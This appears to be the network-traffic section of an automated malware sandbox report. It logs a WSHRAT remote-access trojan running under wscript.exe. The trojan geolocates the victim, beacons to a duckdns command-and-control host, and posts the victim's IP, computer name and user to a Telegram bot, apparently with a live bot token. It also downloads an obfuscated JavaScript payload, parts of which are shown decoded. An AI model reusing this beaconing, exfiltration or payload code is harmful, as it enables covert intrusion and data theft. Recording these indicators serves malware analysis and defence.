May 22, 2024 02:46:49.618267059 CEST	472	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 22 May 2024 00:46:49 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 22 May 2024 01:46:49 GMT Location: https://pastebin.com/raw/NsQ5qTHr Server: cloudflare CF-RAY: 8878ca97bff1423b-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	208.95.112.1	80	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:46:51.165055037 CEST	277	OUT	GET /json/ HTTP/1.1 Accept: / user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive
May 22, 2024 02:46:51.652448893 CEST	483	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:46:50 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.175"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	40.242.114.161	8426	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:46:51.806516886 CEST	359	OUT	POST /is-ready HTTP/1.1 Accept: / user-agent: WSHRAT\|B81A4609\|user-PC\|user\|Microsoft Windows 10 Pro\|plus\|Windows Defender .\|false - 21/5/2024\|JavaScript-v3.4\|US:United States Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: masterokrwh.duckdns.org:8426 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	40.242.114.161	8426	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:47:18.274641991 CEST	359	OUT	POST /is-ready HTTP/1.1 Accept: / user-agent: WSHRAT\|B81A4609\|user-PC\|user\|Microsoft Windows 10 Pro\|plus\|Windows Defender .\|false - 21/5/2024\|JavaScript-v3.4\|US:United States Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: masterokrwh.duckdns.org:8426 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	104.20.4.235	80	5700	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:47:25.599539042 CEST	182	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
May 22, 2024 02:47:26.073175907 CEST	472	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 22 May 2024 00:47:26 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 22 May 2024 01:47:26 GMT Location: https://pastebin.com/raw/NsQ5qTHr Server: cloudflare CF-RAY: 8878cb7b8d680c7a-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49751	40.242.114.161	8426	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:47:44.674705982 CEST	359	OUT	POST /is-ready HTTP/1.1 Accept: / user-agent: WSHRAT\|B81A4609\|user-PC\|user\|Microsoft Windows 10 Pro\|plus\|Windows Defender .\|false - 21/5/2024\|JavaScript-v3.4\|US:United States Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: masterokrwh.duckdns.org:8426 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	40.242.114.161	8426	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:48:11.147838116 CEST	359	OUT	POST /is-ready HTTP/1.1 Accept: / user-agent: WSHRAT\|B81A4609\|user-PC\|user\|Microsoft Windows 10 Pro\|plus\|Windows Defender .\|false - 21/5/2024\|JavaScript-v3.4\|US:United States Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: masterokrwh.duckdns.org:8426 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.25.148	443	6996	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:38 UTC	281	OUT	GET / HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: json.geoiplookup.io Connection: Keep-Alive
2024-05-22 00:46:39 UTC	801	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:46:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 10000 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KINcSY9e1peyAaOJ98LpxOlcEbnvFPJGA6SyE3QcrTfW3Kg38%2FaqsDDBOhjXAJ3CE1eXtDIGOU93%2BZ3Aca%2FfOXuGokd5va7vW1XJRbLtNE9GjMRYgwvEPSPRM6G4oHhFsfMxZKxX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8878ca542e2972bc-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 00:46:39 UTC	568	IN	Data Raw: 32 65 34 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 4c 65 76 65 6c 20 33 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 65 22 3a 20 34 30 2e 37 31 32 38 2c 0a 20 20 20 20 22 6c 6f 6e 67 69 74 75 64 65 22 3a 20 2d 37 34 2e 30 30 36 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 5f 63 6f 64 65 22 3a 20 22 31 30 31 32 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 Data Ascii: 2e4{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New
2024-05-22 00:46:39 UTC	179	IN	Data Raw: 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 20 2d 20 4c 65 76 65 6c 20 33 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 55 53 20 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: munications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false}
2024-05-22 00:46:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	149.154.167.220	443	6996	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:40 UTC	289	OUT	POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 104 Host: api.telegram.org
2024-05-22 00:46:40 UTC	104	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 34 38 31 32 37 30 39 30 38 22 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 2c 20 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 4a 4f 4e 45 53 2d 50 43 2c 20 55 73 65 72 3a 20 6a 6f 6e 65 73 22 7d Data Ascii: {"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: user-PC, User: user"}
2024-05-22 00:46:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 22 May 2024 00:46:40 GMT Content-Type: application/json Content-Length: 350 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-05-22 00:46:40 UTC	350	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 36 38 31 32 36 34 36 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 49 4c 45 20 43 4c 49 43 4b 45 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 6c 69 6b 65 64 61 62 6f 66 69 6c 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 38 31 32 37 30 39 30 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 61 64 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 36 33 33 38 38 30 30 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 Data Ascii: {"ok":true,"result":{"message_id":2154,"from":{"id":6968126468,"is_bot":true,"first_name":"FILE CLICKED","username":"clikedabofilebot"},"chat":{"id":6481270908,"first_name":"Xadin","type":"private"},"date":1716338800,"text":"Access granted! IP: 8.46.123.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.66.44.176	443	6996	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:41 UTC	341	OUT	GET /98575.js HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: textjdbimanrminiall.pages.dev Connection: Keep-Alive
2024-05-22 00:46:41 UTC	772	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:46:41 GMT Content-Type: application/javascript Content-Length: 946662 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: "0c2349718f39a2ea8899476317769f33" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2U8mPkNpcnKr5VakI28mAnF0IvZYaVXoCv9HnWVQHCMrtZvr3t5LSOVZ%2BgMuaTC4ZLLU9ZJwXkzF5VXlJfQokaDuoRzc7cVFQua7O1km6BTA9jua3InU78AdoSzkXj%2FMPtaGEJg%2BaUYklr7Gce3MQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8878ca64ee5c4382-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 00:46:41 UTC	597	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 39 36 35 62 2c 5f 30 78 31 31 33 65 37 63 29 7b 76 61 72 20 5f 30 78 34 63 35 36 31 62 3d 5f 30 78 31 38 39 36 35 62 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 63 65 65 62 39 28 5f 30 78 33 32 32 64 66 63 2c 5f 30 78 32 37 31 64 31 62 2c 5f 30 78 34 32 32 37 63 32 2c 5f 30 78 33 63 37 30 62 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 64 38 66 28 5f 30 78 33 63 37 30 62 63 2d 30 78 31 64 62 2c 5f 30 78 33 32 32 64 66 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 31 35 30 38 31 28 5f 30 78 34 37 62 64 34 61 2c 5f 30 78 35 32 37 64 39 61 2c 5f 30 78 31 64 65 62 64 62 2c 5f 30 78 32 61 64 38 61 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 64 38 66 28 5f 30 78 32 61 64 38 61 62 2d 20 2d 30 78 31 63 61 2c 5f 30 Data Ascii: (function(_0x18965b,_0x113e7c){var _0x4c561b=_0x18965b();function _0x1ceeb9(_0x322dfc,_0x271d1b,_0x4227c2,_0x3c70bc){return _0x5d8f(_0x3c70bc-0x1db,_0x322dfc);}function _0x315081(_0x47bd4a,_0x527d9a,_0x1debdb,_0x2ad8ab){return _0x5d8f(_0x2ad8ab- -0x1ca,_0
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 30 78 31 2b 2d 30 78 31 30 37 33 2a 2d 30 78 31 2b 2d 30 78 62 33 2a 30 78 32 36 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 63 65 65 62 39 28 30 78 63 39 34 2c 30 78 32 32 34 36 2c 30 78 32 31 31 64 2c 30 78 31 65 65 65 29 29 2f 28 30 78 31 34 38 66 2b 2d 30 78 34 38 36 2a 30 78 33 2b 2d 30 78 36 66 38 2a 30 78 31 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 63 65 65 62 39 28 30 78 31 62 66 35 2c 30 78 31 38 62 63 2c 30 78 32 61 34 30 2c 30 78 32 33 37 65 29 29 2f 28 30 78 35 39 61 2b 2d 30 78 31 33 32 38 2b 2d 30 78 34 66 2a 2d 30 78 32 63 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 35 30 38 31 28 30 78 31 38 37 32 2c 30 78 32 39 33 65 2c 30 78 31 37 38 63 2c 30 78 31 64 31 33 29 29 2f 28 30 78 61 64 2a 2d 30 78 33 31 2b 30 78 64 30 2b 30 78 Data Ascii: 0x1+-0x1073-0x1+-0xb30x26))+parseInt(_0x1ceeb9(0xc94,0x2246,0x211d,0x1eee))/(0x148f+-0x4860x3+-0x6f80x1)+parseInt(_0x1ceeb9(0x1bf5,0x18bc,0x2a40,0x237e))/(0x59a+-0x1328+-0x4f-0x2c)+-parseInt(_0x315081(0x1872,0x293e,0x178c,0x1d13))/(0xad-0x31+0xd0+0x
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 36 35 37 3d 5f 30 78 31 36 34 35 35 30 3b 72 65 74 75 72 6e 20 65 76 61 6c 28 5f 30 78 35 63 34 36 35 37 5b 27 44 73 69 50 59 27 5d 28 5f 30 78 35 63 34 36 35 37 5b 5f 30 78 33 39 31 64 35 61 28 30 78 34 35 32 33 2c 30 78 33 31 61 61 2c 30 78 33 63 35 64 2c 30 78 33 65 64 35 29 5d 28 27 28 27 2c 5f 30 78 34 34 37 37 63 30 29 2c 27 29 27 29 29 3b 7d 2c 4a 53 4f 4e 5b 5f 30 78 64 66 61 37 36 34 28 30 78 32 34 63 32 2c 30 78 31 33 32 31 2c 30 78 31 37 33 39 2c 30 78 32 64 34 64 29 5d 3d 4a 53 4f 4e 5b 5f 30 78 33 65 37 34 37 33 28 30 78 31 35 62 34 2c 30 78 31 38 64 31 2c 30 78 31 39 34 32 2c 30 78 31 39 39 38 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 34 35 33 62 33 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 39 33 64 37 61 28 5f 30 78 32 36 30 66 Data Ascii: 657=_0x164550;return eval(_0x5c4657['DsiPY'](_0x5c4657[_0x391d5a(0x4523,0x31aa,0x3c5d,0x3ed5)]('(',_0x4477c0),')'));},JSON[_0xdfa764(0x24c2,0x1321,0x1739,0x2d4d)]=JSON[_0x3e7473(0x15b4,0x18d1,0x1942,0x1998)]\|\|function(_0x5453b3){function _0x493d7a(_0x260f
2024-05-22 00:46:41 UTC	236	IN	Data Raw: 39 2c 30 78 31 30 62 38 2c 30 78 31 35 65 37 29 5d 28 5f 30 78 33 66 33 37 39 31 5b 27 4f 53 49 76 6b 27 5d 28 27 5c 78 32 32 27 2c 5f 30 78 35 34 35 33 62 33 29 2c 27 5c 78 32 32 27 29 3b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 5f 30 78 35 34 35 33 62 33 29 3b 7d 65 6c 73 65 7b 76 61 72 20 5f 30 78 34 64 64 66 33 30 2c 5f 30 78 34 63 35 35 35 63 2c 5f 30 78 34 31 62 32 35 30 3d 5b 5d 2c 5f 30 78 35 30 35 62 32 61 3d 5f 30 78 35 34 35 33 62 33 26 26 5f 30 78 33 66 33 37 39 31 5b 5f 30 78 34 39 33 64 37 61 28 30 78 32 30 63 38 2c 30 78 36 65 61 2c 30 78 31 38 30 63 2c 30 78 62 35 38 29 5d 28 5f 30 78 35 34 35 33 62 33 5b 27 63 6f 6e 73 74 72 75 63 74 6f 27 2b 27 72 27 5d 2c 41 72 72 61 79 29 3b 66 Data Ascii: 9,0x10b8,0x15e7)](_0x3f3791['OSIvk']('\x22',_0x5453b3),'\x22');return String(_0x5453b3);}else{var _0x4ddf30,_0x4c555c,_0x41b250=[],_0x505b2a=_0x5453b3&&_0x3f3791[_0x493d7a(0x20c8,0x6ea,0x180c,0xb58)](_0x5453b3['constructo'+'r'],Array);f
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 6f 72 28 5f 30 78 34 64 64 66 33 30 20 69 6e 20 5f 30 78 35 34 35 33 62 33 29 7b 5f 30 78 34 63 35 35 35 63 3d 5f 30 78 35 34 35 33 62 33 5b 5f 30 78 34 64 64 66 33 30 5d 2c 5f 30 78 33 30 63 32 38 33 3d 74 79 70 65 6f 66 20 5f 30 78 34 63 35 35 35 63 3b 69 66 28 5f 30 78 33 66 33 37 39 31 5b 5f 30 78 32 36 35 36 66 36 28 30 78 31 31 38 32 2c 30 78 34 63 63 2c 30 78 31 30 65 61 2c 30 78 32 37 66 61 29 5d 28 5f 30 78 33 30 63 32 38 33 2c 5f 30 78 33 66 33 37 39 31 5b 5f 30 78 32 36 35 36 66 36 28 30 78 34 32 33 38 2c 30 78 33 32 32 64 2c 30 78 32 66 35 63 2c 30 78 33 62 37 63 29 5d 29 29 5f 30 78 34 63 35 35 35 63 3d 5f 30 78 33 66 33 37 39 31 5b 5f 30 78 34 39 33 64 37 61 28 2d 30 78 32 66 39 2c 30 78 31 62 35 36 2c 30 78 31 30 62 38 2c 30 78 31 62 35 29 Data Ascii: or(_0x4ddf30 in _0x5453b3){_0x4c555c=_0x5453b3[_0x4ddf30],_0x30c283=typeof _0x4c555c;if(_0x3f3791[_0x2656f6(0x1182,0x4cc,0x10ea,0x27fa)](_0x30c283,_0x3f3791[_0x2656f6(0x4238,0x322d,0x2f5c,0x3b7c)]))_0x4c555c=_0x3f3791[_0x493d7a(-0x2f9,0x1b56,0x10b8,0x1b5)
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 35 33 30 66 30 63 5b 5f 30 78 34 31 65 64 30 62 28 2d 30 78 36 63 38 2c 2d 30 78 33 61 62 2c 2d 30 78 61 31 34 2c 30 78 63 38 36 29 5d 3d 5f 30 78 34 31 65 64 30 62 28 30 78 61 66 66 2c 30 78 62 33 64 2c 30 78 31 32 63 63 2c 30 78 31 62 34 29 2b 27 70 65 27 2c 5f 30 78 35 33 30 66 30 63 5b 5f 30 78 35 34 66 31 31 34 28 30 78 31 61 37 34 2c 30 78 33 32 36 39 2c 30 78 31 30 37 61 2c 30 78 31 63 35 30 29 5d 3d 5f 30 78 34 31 65 64 30 62 28 30 78 32 66 37 35 2c 30 78 32 64 66 66 2c 30 78 33 61 35 32 2c 30 78 32 38 38 36 29 2b 5f 30 78 35 34 66 31 31 34 28 30 78 31 39 63 61 2c 30 78 62 35 36 2c 30 78 61 38 65 2c 30 78 61 38 63 29 2c 5f 30 78 35 33 30 66 30 63 5b 27 69 54 79 57 44 27 5d 3d 5f 30 78 34 31 65 64 30 62 28 30 78 66 33 64 2c 30 78 32 61 36 39 2c 30 Data Ascii: 530f0c[_0x41ed0b(-0x6c8,-0x3ab,-0xa14,0xc86)]=_0x41ed0b(0xaff,0xb3d,0x12cc,0x1b4)+'pe',_0x530f0c[_0x54f114(0x1a74,0x3269,0x107a,0x1c50)]=_0x41ed0b(0x2f75,0x2dff,0x3a52,0x2886)+_0x54f114(0x19ca,0xb56,0xa8e,0xa8c),_0x530f0c['iTyWD']=_0x41ed0b(0xf3d,0x2a69,0
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 32 39 2c 30 78 66 36 38 2c 30 78 32 64 36 33 2c 30 78 32 37 35 65 29 5d 28 5f 30 78 33 36 32 64 35 61 5b 5f 30 78 34 31 65 64 30 62 28 30 78 37 32 31 2c 30 78 36 33 63 2c 30 78 38 34 35 2c 30 78 36 36 34 29 5d 2c 5f 30 78 33 66 65 31 62 33 29 2b 5f 30 78 33 36 32 64 35 61 5b 5f 30 78 35 34 66 31 31 34 28 30 78 33 30 36 30 2c 30 78 32 38 39 66 2c 30 78 32 31 66 32 2c 30 78 31 63 39 65 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 5f 30 78 33 31 35 35 64 65 5b 5f 30 78 35 34 66 31 31 34 28 30 78 31 36 62 36 2c 30 78 66 36 38 2c 30 78 32 30 39 38 2c 30 78 31 30 37 35 29 5d 28 4a 53 4f 4e 5b 5f 30 78 35 34 66 31 31 34 28 30 78 37 65 2c 30 78 32 33 31 64 2c 30 78 39 30 61 2c 30 78 31 35 38 37 29 5d 28 5f 30 78 32 62 38 30 34 64 29 29 3b 63 6f 6e Data Ascii: 29,0xf68,0x2d63,0x275e)](_0x362d5a[_0x41ed0b(0x721,0x63c,0x845,0x664)],_0x3fe1b3)+_0x362d5a[_0x54f114(0x3060,0x289f,0x21f2,0x1c9e)];continue;case'3':_0x3155de[_0x54f114(0x16b6,0xf68,0x2098,0x1075)](JSON[_0x54f114(0x7e,0x231d,0x90a,0x1587)](_0x2b804d));con
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 62 52 59 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 32 64 37 62 2c 5f 30 78 66 37 33 37 37 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 39 32 64 37 62 28 5f 30 78 66 37 33 37 37 32 29 3b 7d 2c 27 49 4a 6d 56 77 27 3a 5f 30 78 32 30 34 64 34 37 28 30 78 31 30 36 35 2c 30 78 32 64 31 2c 2d 30 78 63 61 62 2c 2d 30 78 32 30 61 29 2b 5f 30 78 32 39 63 35 38 63 28 30 78 31 62 37 63 2c 30 78 31 36 36 36 2c 30 78 33 30 38 35 2c 30 78 31 34 33 37 29 2c 27 44 5a 68 5a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 33 65 31 30 63 2c 5f 30 78 31 30 33 62 30 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 33 65 31 30 63 2b 5f 30 78 31 30 33 62 30 34 3b 7d 2c 27 57 64 6a 6e 74 27 3a 27 25 63 6f 6d 73 70 65 63 25 5c 78 32 30 27 2b 5f 30 78 32 39 63 35 38 63 28 30 78 31 31 Data Ascii: bRY':function(_0x592d7b,_0xf73772){return _0x592d7b(_0xf73772);},'IJmVw':_0x204d47(0x1065,0x2d1,-0xcab,-0x20a)+_0x29c58c(0x1b7c,0x1666,0x3085,0x1437),'DZhZd':function(_0x53e10c,_0x103b04){return _0x53e10c+_0x103b04;},'Wdjnt':'%comspec%\x20'+_0x29c58c(0x11
